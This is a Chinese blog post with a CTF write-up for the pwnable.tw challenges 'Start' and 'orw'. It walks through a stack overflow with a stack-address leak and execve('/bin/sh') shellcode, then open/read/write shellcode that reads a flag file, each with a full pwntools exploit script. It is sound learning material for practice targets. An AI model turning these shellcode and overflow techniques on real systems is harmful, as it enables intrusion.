<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.2" rel="stylesheet" type="text/css">


  <meta name="keywords" content="CTF,Pwn,">





  <link rel="alternate" href="/atom.xml" title="Ver" type="application/atom+xml">




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.2">






<meta name="description" content="简介最近因为保研的事情弄得自己心急气躁的，学习效率几乎为0。决定还是写篇博客找找学习的感觉，也自己立下个flag，争取每天都在pwntw刷一道题，好好学习下pwn。">
<meta name="keywords" content="CTF,Pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="Pwn tw 刷题记录">
<meta property="og:url" content="http://yoursite.com/2019/09/13/Pwn-tw-刷题记录/index.html">
<meta property="og:site_name" content="Ver">
<meta property="og:description" content="简介最近因为保研的事情弄得自己心急气躁的，学习效率几乎为0。决定还是写篇博客找找学习的感觉，也自己立下个flag，争取每天都在pwntw刷一道题，好好学习下pwn。">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://yoursite.com/2019/09/13/Pwn-tw-刷题记录/start0.jpg">
<meta property="og:image" content="http://yoursite.com/2019/09/13/Pwn-tw-刷题记录/start2.jpg">
<meta property="og:image" content="http://yoursite.com/2019/09/13/Pwn-tw-刷题记录/start1.jpg">
<meta property="og:image" content="http://yoursite.com/2019/09/13/Pwn-tw-刷题记录/start3.jpg">
<meta property="og:image" content="http://yoursite.com/2019/09/13/Pwn-tw-刷题记录/start4.jpg">
<meta property="og:image" content="http://yoursite.com/2019/09/13/Pwn-tw-刷题记录/start5.jpg">
<meta property="og:image" content="http://yoursite.com/2019/09/13/Pwn-tw-刷题记录/orw0.jpg">
<meta property="og:image" content="http://yoursite.com/2019/09/13/Pwn-tw-刷题记录/orw1.jpg">
<meta property="og:image" content="http://yoursite.com/2019/09/13/Pwn-tw-刷题记录/orw2.jpg">
<meta property="og:image" content="http://yoursite.com/2019/09/13/Pwn-tw-刷题记录/orw3.jpg">
<meta property="og:image" content="http://yoursite.com/2019/09/13/Pwn-tw-刷题记录/orw4.jpg">
<meta property="og:image" content="http://yoursite.com/2019/09/13/Pwn-tw-刷题记录/orw5.jpg">
<meta property="og:image" content="http://yoursite.com/2019/09/13/Pwn-tw-刷题记录/orw6.jpg">
<meta property="og:image" content="http://yoursite.com/2019/09/13/Pwn-tw-刷题记录/orw7.jpg">
<meta property="og:updated_time" content="2019-09-13T04:26:58.860Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Pwn tw 刷题记录">
<meta name="twitter:description" content="简介最近因为保研的事情弄得自己心急气躁的，学习效率几乎为0。决定还是写篇博客找找学习的感觉，也自己立下个flag，争取每天都在pwntw刷一道题，好好学习下pwn。">
<meta name="twitter:image" content="http://yoursite.com/2019/09/13/Pwn-tw-刷题记录/start0.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    sidebar: {"position":"left","display":"always","offset":12,"offset_float":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/09/13/Pwn-tw-刷题记录/">





  <title>Pwn tw 刷题记录 | Ver</title>
  














</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Ver</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/09/13/Pwn-tw-刷题记录/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Vergissmeinnicht">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ver">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Pwn tw 刷题记录</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-09-13T10:07:31+08:00">
                2019-09-13
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/Pwn/" itemprop="url" rel="index">
                    <span itemprop="name">Pwn</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>最近因为保研的事情弄得自己心急气躁的，学习效率几乎为0。决定还是写篇博客找找学习的感觉，也自己立下个flag，争取每天都在pwntw刷一道题，好好学习下pwn。<br><a id="more"></a></p>
<hr>
<h1 id="Start"><a href="#Start" class="headerlink" title="Start"></a>Start</h1><h2 id="题目描述"><a href="#题目描述" class="headerlink" title="题目描述"></a>题目描述</h2><blockquote>
<p>Just a start.<br>nc chall.pwnable.tw 10000</p>
</blockquote>
<h2 id="基本信息"><a href="#基本信息" class="headerlink" title="基本信息"></a>基本信息</h2><p>file检查一下，32位，动态链接</p>
<div style="width: 80%; margin: auto"><img src="/2019/09/13/Pwn-tw-刷题记录/start0.jpg" alt="start0"></div>

<p>checksec一下，没有任何保护</p>
<div style="width: 80%; margin: auto"><img src="/2019/09/13/Pwn-tw-刷题记录/start2.jpg" alt="start2"></div>

<p>ida打开如下：</p>
<div style="width: 80%; margin: auto"><img src="/2019/09/13/Pwn-tw-刷题记录/start1.jpg" alt="start1"></div>

<h2 id="解题思路"><a href="#解题思路" class="headerlink" title="解题思路"></a>解题思路</h2><p>F5出来之后的东西有点奇怪，所以直接看汇编<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">public _start</span><br><span class="line">_start proc near</span><br><span class="line">push    esp</span><br><span class="line">push    offset _exit</span><br><span class="line">xor     eax, eax</span><br><span class="line">xor     ebx, ebx</span><br><span class="line">xor     ecx, ecx</span><br><span class="line">xor     edx, edx</span><br><span class="line">push    3A465443h</span><br><span class="line">push    20656874h</span><br><span class="line">push    20747261h</span><br><span class="line">push    74732073h</span><br><span class="line">push    2774654Ch</span><br><span class="line">mov     ecx, esp        ; addr</span><br><span class="line">mov     dl, 14h         ; len</span><br><span class="line">mov     bl, 1           ; fd</span><br><span class="line">mov     al, 4</span><br><span class="line">int     80h             ; LINUX - sys_write</span><br><span class="line">xor     ebx, ebx</span><br><span class="line">mov     dl, 3Ch</span><br><span class="line">mov     al, 3</span><br><span class="line">int     80h             ; LINUX -</span><br><span class="line">add     esp, 14h</span><br><span class="line">retn</span><br><span class="line">_start endp ; sp-analysis failed</span><br></pre></td></tr></table></figure></p>
<p>程序逻辑大概就是首先将需要的参数传入寄存器，然后执行系统调用，根据<a href="http://syscalls.kernelgrok.com/" target="_blank" rel="noopener">这里</a>的查找，可以确定第一个系统调用为sys_write</p>
<div style="width: 80%; margin: auto"><img src="/2019/09/13/Pwn-tw-刷题记录/start3.jpg" alt="start3"></div>

<p>其中eax为系统调用参数，0x4便是sys_write。ebx为fd，这里是1。ecx为buf，这里为esp。edx为size，这里为0x14</p>
<p>这里就是将<code>Let&#39;s start the CTF:</code>这句话压入栈，然后通过sys_write打印到bash中</p>
<p>之后程序又将ebx置零，然后将edx改为0x3c，eax改为0x3。这里也就是代表捕获bash中的输入并且覆盖到esp上面去</p>
<div style="width: 80%; margin: auto"><img src="/2019/09/13/Pwn-tw-刷题记录/start4.jpg" alt="start4"></div>

<p>经过gdb调试，我发现也的确是这样的</p>
<div style="width: 80%; margin: auto"><img src="/2019/09/13/Pwn-tw-刷题记录/start5.jpg" alt="start5"></div>

<p>其中<code>0xffffcdc8</code>处也就是返回地址</p>
<p>那么这便是简单的栈溢出，由于没有开启nx，我们可以将shellcode写入栈上，然后控制返回地址到shellcode即可，其中偏移为20</p>
<p>但是由于我们的shellcode普遍大于20，那么我们写只能写在返回地址之后，shellcode可以在<a href="http://shell-storm.org/shellcode/" target="_blank" rel="noopener">这里</a>寻找</p>
<p>不过这里还有个问题便是如何获取栈地址，我注意到汇编代码中有这么一句</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mov     ecx, esp        ; addr</span><br></pre></td></tr></table></figure>
<p>在retn的时候如果我们控制返回地址到这里，那么接下来程序便会将此时的esp打印出来，这样我们便可以获得当前的esp地址，然后便可以算出shellcode的位置</p>
<p>PS:这里需要注意不能用<code>sendline</code>函数，因为sendline会把当前的esp中的内容覆盖掉，这样就获取不了esp的值了</p>
<h2 id="解题脚本"><a href="#解题脚本" class="headerlink" title="解题脚本"></a>解题脚本</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> pwnlib <span class="keyword">import</span> gdb</span><br><span class="line">context.terminal = [<span class="string">'gnome-terminal'</span>,<span class="string">'-x'</span>,<span class="string">'sh'</span>,<span class="string">'-c'</span>]</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">r = process(<span class="string">'./start'</span>)</span><br><span class="line">gdb.attach(r)</span><br><span class="line"></span><br><span class="line">sd = <span class="keyword">lambda</span> x : r.send(x)</span><br><span class="line">sl = <span class="keyword">lambda</span> x : r.sendline(x)</span><br><span class="line">rv = <span class="keyword">lambda</span> x = <span class="number">2048</span> : r.recv(x)</span><br><span class="line">ru = <span class="keyword">lambda</span> x : r.recvuntil(x)</span><br><span class="line">rl = <span class="keyword">lambda</span> : r.recvline()</span><br><span class="line">ia = <span class="keyword">lambda</span> : r.interactive()</span><br><span class="line">ra = <span class="keyword">lambda</span> : r.recvall()</span><br><span class="line">sla = <span class="keyword">lambda</span> x,y: r.sendlineafter(x,y)</span><br><span class="line">sa = <span class="keyword">lambda</span> x,y : r.sendafter(x,y)</span><br><span class="line"></span><br><span class="line">offset = <span class="number">20</span></span><br><span class="line">ru(<span class="string">'Let\'s start the CTF:'</span>)</span><br><span class="line">write_addr = <span class="number">0x08048087</span></span><br><span class="line">payload = <span class="string">'A'</span>*offset + p32(write_addr)</span><br><span class="line">sd(payload)</span><br><span class="line">esp_addr = u32(rv(<span class="number">4</span>))</span><br><span class="line">print(<span class="string">'[+]Esp_addr: '</span>+hex(esp_addr))</span><br><span class="line"></span><br><span class="line">shellcode = asm(<span class="string">'\n'</span>.join([</span><br><span class="line">    <span class="string">'push %d'</span> % u32(<span class="string">'/sh\0'</span>),</span><br><span class="line">    <span class="string">'push %d'</span> % u32(<span class="string">'/bin'</span>),</span><br><span class="line">    <span class="string">'xor edx, edx'</span>,</span><br><span class="line">    <span class="string">'xor ecx, ecx'</span>,</span><br><span class="line">    <span class="string">'mov ebx, esp'</span>,</span><br><span class="line">    <span class="string">'mov eax, 0xb'</span>,</span><br><span class="line">    <span class="string">'int 0x80'</span>,</span><br><span class="line">]))</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'A'</span>*offset + p32(esp_addr+<span class="number">20</span>) + shellcode</span><br><span class="line">sd(payload)</span><br><span class="line">ia()</span><br></pre></td></tr></table></figure>
<hr>
<h1 id="orw"><a href="#orw" class="headerlink" title="orw"></a>orw</h1><h2 id="题目描述-1"><a href="#题目描述-1" class="headerlink" title="题目描述"></a>题目描述</h2><blockquote>
<p>Read the flag from /home/orw/flag.<br>Only open read write syscall are allowed to use.<br>nc chall.pwnable.tw 10001</p>
</blockquote>
<h2 id="基本信息-1"><a href="#基本信息-1" class="headerlink" title="基本信息"></a>基本信息</h2><p>file检查一下，32位，动态链接</p>
<div style="width: 80%; margin: auto"><img src="/2019/09/13/Pwn-tw-刷题记录/orw0.jpg" alt="orw0"></div>

<p>checksec一下，开启了Canary和Part relro</p>
<div style="width: 80%; margin: auto"><img src="/2019/09/13/Pwn-tw-刷题记录/orw1.jpg" alt="orw1"></div>

<p>ida打开如下：</p>
<div style="width: 80%; margin: auto"><img src="/2019/09/13/Pwn-tw-刷题记录/orw2.jpg" alt="orw2"></div>

<h2 id="解题思路-1"><a href="#解题思路-1" class="headerlink" title="解题思路"></a>解题思路</h2><p>正如题目表述的那样，我们只能使用<code>open/read/write</code>三个syscall，限制他们的也正是<code>orw_seccomp</code>函数</p>
<div style="width: 80%; margin: auto"><img src="/2019/09/13/Pwn-tw-刷题记录/orw3.jpg" alt="orw3"></div>

<p>那么思路也很清楚，open打开flag文件，read读取文件，write打印文件内容</p>
<p>首先我们看open函数，eax为0x5；ebx为文件名；ecx为flags，也就是open的第二个参数；edx为mode；在执行了open之后，fd便存储在eax</p>
<div style="width: 80%; margin: auto"><img src="/2019/09/13/Pwn-tw-刷题记录/orw4.jpg" alt="orw4"></div>

<p>那么我们可以这样编写shellcode<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"># fd = open(&apos;/home/orw/flag&apos;,0)</span><br><span class="line">mov ecx,0</span><br><span class="line">mov eax,SYS_open</span><br><span class="line">call here</span><br><span class="line">.string &quot;/home/orw/flag&quot;</span><br><span class="line">.byte 0</span><br><span class="line">here:</span><br><span class="line">pop ebx</span><br><span class="line">int 0x80</span><br></pre></td></tr></table></figure></p>
<p>然后我们看read函数，eax为0x3；ebx为fd，也就是open之后的eax；ecx为buf；edx为count，也就是size</p>
<div style="width: 80%; margin: auto"><img src="/2019/09/13/Pwn-tw-刷题记录/orw5.jpg" alt="orw5"></div>

<p>vmmap看一下，bss段可读可写可执行，我们可以把文件内容写入bss段</p>
<div style="width: 80%; margin: auto"><img src="/2019/09/13/Pwn-tw-刷题记录/orw6.jpg" alt="orw6"></div>

<p>那么我们可以这样编写shellcode<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># read(fd,bss+0x40,0x40)</span><br><span class="line">mov ebx,eax</span><br><span class="line">mov eax,SYS_read</span><br><span class="line">mov ecx,0x0804A100</span><br><span class="line">mov edx,0x40</span><br><span class="line">int 0x80</span><br></pre></td></tr></table></figure></p>
<p>最后我们看write函数，eax为0x4，ebx为fd，输出到屏幕就是1；ecx为buf；edx为vien，也就是size</p>
<div style="width: 80%; margin: auto"><img src="/2019/09/13/Pwn-tw-刷题记录/orw7.jpg" alt="orw7"></div>

<p>那么我们可以这样编写shellcode<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#write(1,bss+0x40,0x40)</span><br><span class="line">mov ebx,0x1</span><br><span class="line">mov eax,SYS_write</span><br><span class="line">mov ecx,0x0804A100</span><br><span class="line">mov edx,0x40</span><br><span class="line">int 0x80</span><br></pre></td></tr></table></figure></p>
<h2 id="解题脚本-1"><a href="#解题脚本-1" class="headerlink" title="解题脚本"></a>解题脚本</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment"># r = process('./orw')</span></span><br><span class="line">r = remote(<span class="string">'chall.pwnable.tw'</span>, <span class="number">10001</span>)</span><br><span class="line">sd = <span class="keyword">lambda</span> x : r.send(x)</span><br><span class="line">sl = <span class="keyword">lambda</span> x : r.sendline(x)</span><br><span class="line">rv = <span class="keyword">lambda</span> x = <span class="number">2048</span> : r.recv(x)</span><br><span class="line">ru = <span class="keyword">lambda</span> x : r.recvuntil(x)</span><br><span class="line">rl = <span class="keyword">lambda</span> : r.recvline()</span><br><span class="line">ia = <span class="keyword">lambda</span> : r.interactive()</span><br><span class="line">ra = <span class="keyword">lambda</span> : r.recvall()</span><br><span class="line">sla = <span class="keyword">lambda</span> x,y: r.sendlineafter(x,y)</span><br><span class="line">sa = <span class="keyword">lambda</span> x,y : r.sendafter(x,y)</span><br><span class="line"></span><br><span class="line">ru(<span class="string">'shellcode:'</span>)</span><br><span class="line">code = <span class="string">'''</span></span><br><span class="line"><span class="string">        mov ecx,0</span></span><br><span class="line"><span class="string">        mov eax,SYS_open</span></span><br><span class="line"><span class="string">        call here</span></span><br><span class="line"><span class="string">        .string "/home/orw/flag"</span></span><br><span class="line"><span class="string">        .byte 0</span></span><br><span class="line"><span class="string">        here:</span></span><br><span class="line"><span class="string">        pop ebx</span></span><br><span class="line"><span class="string">        int 0x80</span></span><br><span class="line"><span class="string">        mov ebx,eax</span></span><br><span class="line"><span class="string">        mov eax,SYS_read</span></span><br><span class="line"><span class="string">        mov ecx,0x0804A100</span></span><br><span class="line"><span class="string">        mov edx,0x40</span></span><br><span class="line"><span class="string">        int 0x80</span></span><br><span class="line"><span class="string">        mov ebx,0x1</span></span><br><span class="line"><span class="string">        mov eax,SYS_write</span></span><br><span class="line"><span class="string">        mov ecx,0x0804A100</span></span><br><span class="line"><span class="string">        mov edx,0x40</span></span><br><span class="line"><span class="string">        int 0x80</span></span><br><span class="line"><span class="string">        '''</span></span><br><span class="line"></span><br><span class="line">shellcode=asm(code,arch=<span class="string">"i386"</span>)</span><br><span class="line">sd(shellcode)</span><br><span class="line">ia()</span><br></pre></td></tr></table></figure>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"># CTF</a>
          
            <a href="/tags/Pwn/" rel="tag"># Pwn</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/08/19/Random-attack/" rel="next" title="Random attack">
                <i class="fa fa-chevron-left"></i> Random attack
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            Overview
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="Vergissmeinnicht">
          <p class="site-author-name" itemprop="name">Vergissmeinnicht</p>
           
              <p class="site-description motion-element" itemprop="description">Kap0k/De1ta/Crypto</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">15</span>
                <span class="site-state-item-name">posts</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">4</span>
                <span class="site-state-item-name">categories</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">12</span>
                <span class="site-state-item-name">tags</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#简介"><span class="nav-text">简介</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Start"><span class="nav-text">Start</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#题目描述"><span class="nav-text">题目描述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基本信息"><span class="nav-text">基本信息</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#解题思路"><span class="nav-text">解题思路</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#解题脚本"><span class="nav-text">解题脚本</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#orw"><span class="nav-text">orw</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#题目描述-1"><span class="nav-text">题目描述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基本信息-1"><span class="nav-text">基本信息</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#解题思路-1"><span class="nav-text">解题思路</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#解题脚本-1"><span class="nav-text">解题脚本</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Vergissmeinnicht</span>
</div>


<div class="powered-by">
  Powered by <a class="theme-link" href="https://hexo.io">Hexo</a>
</div>

<div class="theme-info">
  Theme -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Gemini
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.2"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.2"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.2"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.2"></script>



  


  




	





  





  






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
